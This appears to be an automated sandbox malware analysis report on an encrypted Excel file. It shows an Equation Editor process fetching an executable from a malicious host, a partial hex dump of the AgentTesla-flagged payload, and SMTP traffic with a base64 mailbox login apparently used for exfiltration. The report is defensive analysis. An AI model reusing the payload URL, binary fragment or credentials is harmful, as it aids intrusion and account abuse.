                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                  General
                                                  Stream Path:\x6DataSpaces/Version
                                                  File Type:data
                                                  Stream Size:76
                                                  Entropy:2.79079600998
                                                  Base64 Encoded:False
                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 482712
                                                  General
                                                  Stream Path:EncryptedPackage
                                                  File Type:data
                                                  Stream Size:482712
                                                  Entropy:7.99945669212
                                                  Base64 Encoded:True
                                                  Data ASCII:. ] . . . . . . l . . F . 6 . . . . ~ h B . . U / . . T _ Z . . . ! . R . ] 8 . . ; y K . . . . . . " . m ` . . . . . . . . . o . . . . . . . ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q . 5 ` . i x . < ` . . . . S . q
                                                  Data Raw:90 5d 07 00 00 00 00 00 6c 88 0f 46 f7 36 f5 ed cd 8f 7e 68 42 b3 10 55 2f 95 82 54 5f 5a d5 de a1 21 da 52 97 5d 38 b3 cf 3b 79 4b fc c6 20 a6 e1 14 a9 22 e1 6d 60 f6 11 da be ec a5 1a 04 8d 6f b5 d2 d2 aa e4 a5 1c 60 fc a5 93 f6 53 09 71 9f 35 60 cb 69 78 e4 3c 60 fc a5 93 f6 53 09 71 9f 35 60 cb 69 78 e4 3c 60 fc a5 93 f6 53 09 71 9f 35 60 cb 69 78 e4 3c 60 fc a5 93 f6 53 09 71
                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                  General
                                                  Stream Path:EncryptionInfo
                                                  File Type:data
                                                  Stream Size:224
                                                  Entropy:4.50295106266
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . Z x . . . . . . i . f C . . . . . . k . } . . . e . X . . [ . o . . . . s . . r . , . . . . z 3 . . r 9 / b . . & R . . . . . . . . H .
                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  04/08/21-12:40:40.925807TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916680192.168.2.22103.153.76.181

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 8, 2021 12:40:40.045516014 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.061516047 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.061651945 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.072184086 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.088083029 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.091963053 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.092001915 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.092159033 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.101201057 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.117136955 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.117352962 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.117429018 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.384695053 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.400538921 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.551120996 CEST44349165104.25.234.53192.168.2.22
                                                  Apr 8, 2021 12:40:40.551194906 CEST49165443192.168.2.22104.25.234.53
                                                  Apr 8, 2021 12:40:40.660151005 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:40.925208092 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:40.925379992 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:40.925806999 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.192792892 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.192826033 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.192884922 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.192965031 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.193018913 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.193031073 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.457707882 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.457740068 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.457756042 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.457789898 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.457804918 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.458470106 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.458514929 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.458534956 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.458549976 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.458587885 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.458626032 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.458642006 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.458681107 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.458715916 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.458754063 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.722701073 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.722740889 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.722754002 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.722798109 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.722836971 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.722876072 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.722902060 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.722930908 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.722978115 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.722994089 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.723030090 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.723042011 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.723053932 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.723120928 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.723140001 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.723156929 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.723208904 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.723251104 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.723323107 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.723364115 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.723419905 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.723467112 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.723483086 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.723522902 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.726373911 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.726469040 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.726545095 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.726555109 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.726587057 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.729671955 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987312078 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987360001 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987416029 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987473965 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987494946 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987497091 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987536907 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987571001 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987612009 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987612963 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987637043 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987649918 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987719059 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987725973 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987749100 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987772942 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987787962 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987818003 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987860918 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987876892 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987904072 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987915993 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987927914 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.987941027 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.987960100 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.988029957 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.988069057 CEST4916680192.168.2.22103.153.76.181
                                                  Apr 8, 2021 12:40:41.988095045 CEST8049166103.153.76.181192.168.2.22
                                                  Apr 8, 2021 12:40:41.988133907 CEST4916680192.168.2.22103.153.76.181

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 8, 2021 12:40:40.008225918 CEST5219753192.168.2.228.8.8.8
                                                  Apr 8, 2021 12:40:40.029531002 CEST53521978.8.8.8192.168.2.22
                                                  Apr 8, 2021 12:40:40.576376915 CEST5309953192.168.2.228.8.8.8
                                                  Apr 8, 2021 12:40:40.608587980 CEST53530998.8.8.8192.168.2.22
                                                  Apr 8, 2021 12:40:40.608848095 CEST5309953192.168.2.228.8.8.8
                                                  Apr 8, 2021 12:40:40.658679008 CEST53530998.8.8.8192.168.2.22
                                                  Apr 8, 2021 12:42:19.710062981 CEST5283853192.168.2.228.8.8.8
                                                  Apr 8, 2021 12:42:19.829515934 CEST53528388.8.8.8192.168.2.22
                                                  Apr 8, 2021 12:42:19.830061913 CEST5283853192.168.2.228.8.8.8
                                                  Apr 8, 2021 12:42:19.874183893 CEST53528388.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Apr 8, 2021 12:40:40.008225918 CEST192.168.2.228.8.8.80xcde3Standard query (0)is.gdA (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:40:40.576376915 CEST192.168.2.228.8.8.80xfa3dStandard query (0)wsdysuresbonescagegp.dns.armyA (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:40:40.608848095 CEST192.168.2.228.8.8.80xfa3dStandard query (0)wsdysuresbonescagegp.dns.armyA (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:42:19.710062981 CEST192.168.2.228.8.8.80xc1d2Standard query (0)smtp.lpsinvest.comA (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:42:19.830061913 CEST192.168.2.228.8.8.80xc1d2Standard query (0)smtp.lpsinvest.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Apr 8, 2021 12:40:40.029531002 CEST8.8.8.8192.168.2.220xcde3No error (0)is.gd104.25.234.53A (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:40:40.029531002 CEST8.8.8.8192.168.2.220xcde3No error (0)is.gd172.67.83.132A (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:40:40.029531002 CEST8.8.8.8192.168.2.220xcde3No error (0)is.gd104.25.233.53A (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:40:40.608587980 CEST8.8.8.8192.168.2.220xfa3dNo error (0)wsdysuresbonescagegp.dns.army103.153.76.181A (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:40:40.658679008 CEST8.8.8.8192.168.2.220xfa3dNo error (0)wsdysuresbonescagegp.dns.army103.153.76.181A (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:42:19.829515934 CEST8.8.8.8192.168.2.220xc1d2No error (0)smtp.lpsinvest.com5.10.29.169A (IP address)IN (0x0001)
                                                  Apr 8, 2021 12:42:19.874183893 CEST8.8.8.8192.168.2.220xc1d2No error (0)smtp.lpsinvest.com5.10.29.169A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • wsdysuresbonescagegp.dns.army

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.2249166103.153.76.18180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 8, 2021 12:40:40.925806999 CEST5OUTGET /documenpt/svchost.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Connection: Keep-Alive
                                                  Host: wsdysuresbonescagegp.dns.army
                                                  Apr 8, 2021 12:40:41.192792892 CEST7INHTTP/1.1 200 OK
                                                  Date: Thu, 08 Apr 2021 10:40:38 GMT
                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
                                                  Last-Modified: Thu, 08 Apr 2021 07:36:25 GMT
                                                  ETag: "dde00-5bf711ad4360e"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 908800
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 79 b2 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 96 0a 00 00 46 03 00 00 00 00 00 9a b4 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 b4 0a 00 4f 00 00 00 00 c0 0a 00 34 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 94 0a 00 00 20 00 00 00 96 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 34 42 03 00 00 c0 0a 00 00 44 03 00 00 98 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 dc 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c b4 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 60 48 00 00 03 00 00 00 01 00 00 06 e0 87 00 00 68 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 33 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 34 00 00 0a 6f 35 00 00 0a 73 36 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELyn`PF @ @@HO4B H.text `.rsrc4BD@@.reloc @B|H?`Hh,0(( (o!*("(#($(%(&*N(ol('*&((*s)s*s+s,s-*0~o.+*0~o/+*0~o0+*0~o1+*0~o2+*0<~(3,!rp(4o5s6~+*0~


                                                  HTTPS Packets

                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                  Apr 8, 2021 12:40:40.092001915 CEST104.25.234.53443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jul 09 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Jul 09 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                  SMTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Apr 8, 2021 12:42:19.971415997 CEST587491675.10.29.169192.168.2.22220 mail.elixir.eu.com
                                                  Apr 8, 2021 12:42:19.971946001 CEST49167587192.168.2.225.10.29.169EHLO 284992
                                                  Apr 8, 2021 12:42:20.005436897 CEST587491675.10.29.169192.168.2.22250-mail.elixir.eu.com Hello [185.32.222.8]
                                                  250-SIZE 31457280
                                                  250-AUTH LOGIN CRAM-MD5
                                                  250-STARTTLS
                                                  250-8BITMIME
                                                  250 OK
                                                  Apr 8, 2021 12:42:20.007747889 CEST49167587192.168.2.225.10.29.169AUTH login aGVsaW9AbHBzaW52ZXN0LmNvbQ==
                                                  Apr 8, 2021 12:42:20.040827036 CEST587491675.10.29.169192.168.2.22334 UGFzc3dvcmQ6
                                                  Apr 8, 2021 12:42:20.075006008 CEST587491675.10.29.169192.168.2.22235 Authentication successful
                                                  Apr 8, 2021 12:42:20.075788021 CEST49167587192.168.2.225.10.29.169MAIL FROM:<helio@lpsinvest.com>
                                                  Apr 8, 2021 12:42:20.109519958 CEST587491675.10.29.169192.168.2.22250 OK <helio@lpsinvest.com> Sender ok

                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:12:39:42
                                                  Start date:08/04/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                  Imagebase:0x13fec0000
                                                  File size:27641504 bytes
                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:12:40:08
                                                  Start date:08/04/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:12:40:13
                                                  Start date:08/04/2021
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                  Imagebase:0xf80000
                                                  File size:908800 bytes
                                                  MD5 hash:F31B0E7D038ED9D64BE2C6EF94FA5171
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 17%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Start time:12:40:18
                                                  Start date:08/04/2021
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\Public\vbc.exe
                                                  Imagebase:0xf80000
                                                  File size:908800 bytes
                                                  MD5 hash:F31B0E7D038ED9D64BE2C6EF94FA5171
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >